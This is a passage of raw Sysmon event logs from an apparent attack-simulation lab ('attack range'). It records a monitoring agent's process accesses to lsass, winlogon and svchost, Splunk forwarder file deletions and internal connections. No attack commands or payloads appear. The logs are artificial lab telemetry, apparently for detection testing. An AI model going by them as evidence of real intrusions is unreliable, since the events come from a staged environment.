Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017308Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:02.653{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017307Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:02.648{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017306Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:02.640{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017305Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:02.630{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017304Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:02.621{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017303Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:02.594{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017302Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:02.588{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017301Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:02.582{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017300Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:02.574{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017299Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:02.567{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017298Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:02.559{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017297Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:02.550{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017296Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:02.547{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 23542300x800000000000000017295Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:02.196{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A10695BD4E88749560EA370ECB2EA4C,SHA256=D1FAF3C427E4C20F759ADB81B78B0BE353336DB09A5512198DF33B0CAF1B83D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044748Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:03.863{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=6CC4687B706F4DC958A0EAA5B60F6052,SHA256=46132FD038E8DB2F2F9A380432763389017CE75462B5D2D5E7D5601EBC8CA082,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044747Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:03.331{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3731994DBE554AF8A223D506C5B3417,SHA256=7C4F2BF6F59A40BB7B78CC2090831A2CF6EC96DC5AAED6AE2774DB7EBB133F5A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017328Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:03.322{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61433630C22A0ABB4AA7A996FA3A08DC,SHA256=394077E0FA422635A697A7C114DA122263982A884461556A46FFC11B7E1EB894,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044749Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:04.397{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D443B6718BD25F8718275AC39BAC6B7,SHA256=59A7A262706C64181DA8E08A0151B048F08A529BF9DBA14D89275EA65610CFB0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017330Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:04.360{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9E3AF563929239FCDFD0E1BC6A59A98,SHA256=8306D890CA25855801379A6FAC13FD3338561422CDBED4BB74DFD85744F7B3B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017329Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:04.124{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B7E616F96B7BBFB82BF7130F79C861FF,SHA256=784F4924BD8FD182C26EA63E1A41C4AA6BD4EA85FEA6DA0417976E9A8570384D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000017332Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:03.986{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50132-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8089- 23542300x800000000000000017331Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:05.444{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08BEBD42610EB5A8F668467C74B5E412,SHA256=45CEBB502EBC6743713A374700AFFB2A1A6FD03723E195D9EA83060C9B403E53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044750Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:05.435{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E2AE46408D7B874C81420120A6F7457,SHA256=2910E76D7A5B81F12E3EF57C351C3E2DC7C2449AD21FAA4BB7BD40732B10B36E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017333Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:06.533{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05825AAC8A696EA30EAA2FCF4A7DBA0D,SHA256=8632B3A318D3DC5FC2A983B3158AF2E1D53FDCBBA2989057C05158A96B960224,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044751Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:06.468{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB6DBED11C984E81B1604EAF473AC545,SHA256=1CC382C82F8E5435BE2A1B0C55E6EFA01E0B6AA2B969C7011A903A6402072DDA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017334Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:07.610{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F21A61A314CFDF6EFA7CAA30102E7EA,SHA256=D1DBAFD1D3261AF8684E62766440D059524D20412C3CC778B7754C9A88BFC8E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044753Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:07.503{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7F4381292EE8C6B60B55B7B1573335C,SHA256=E7EB4B1EFDEECBB2607036C08100411BD0AB211B88842CF5C4CF07D4F6C635EC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000044752Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:04.677{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56401-false10.0.1.12-8000- 354300x800000000000000017336Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:06.982{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50133-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000017335Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:08.687{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C31E59C2C291B9121DB6DC7E42A97A0A,SHA256=EA2F50F115B8ABAAC46D4A0DDE478BDB454C432A784A964850A8220797C42F9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044754Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:08.557{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F41303DEBAE53BC1354DD995126445A,SHA256=BAD65574260CC4245D488DFEAC349427584E675AD5894758F15AA689E9FD5ECD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017337Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:09.772{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6193CD6EED3F1BA9CBD628FE54CCDC99,SHA256=C01C9CD2CF533F0253ED5F5A443ABA2051F56529341EC325D0E0CB5DC4A4D4BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044755Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:09.626{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BE5569B26EA19D5274F492F0CAE4F6E,SHA256=368FB40D5B918751FA78B65D04BF132E891AFFFABB52BC0A2D61907F71CA1072,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017338Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:10.870{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A3C04B2A528D19F41441588752742A1,SHA256=E9EA98DCE2F3A48291F853F43EC6B8019D3C1207FE80A0531712CE5CAA616E61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044756Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:10.662{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59449804ACF905558138522F2A2C0001,SHA256=57D538E9CD8ECAC1E2F438A4F7E153271BE45DCF327B7952F3F90AEBD8F6E1AE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017339Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:11.951{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABAE240DD57BD28B9D1CA09B5A227C1C,SHA256=50F80E6EF61D0C0C4DB476A5E2D777AFFDCEB93289C799F4BF3F1FECC6DFB1E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044781Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:11.883{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044780Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:11.882{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044779Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:11.876{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044778Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:11.875{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program 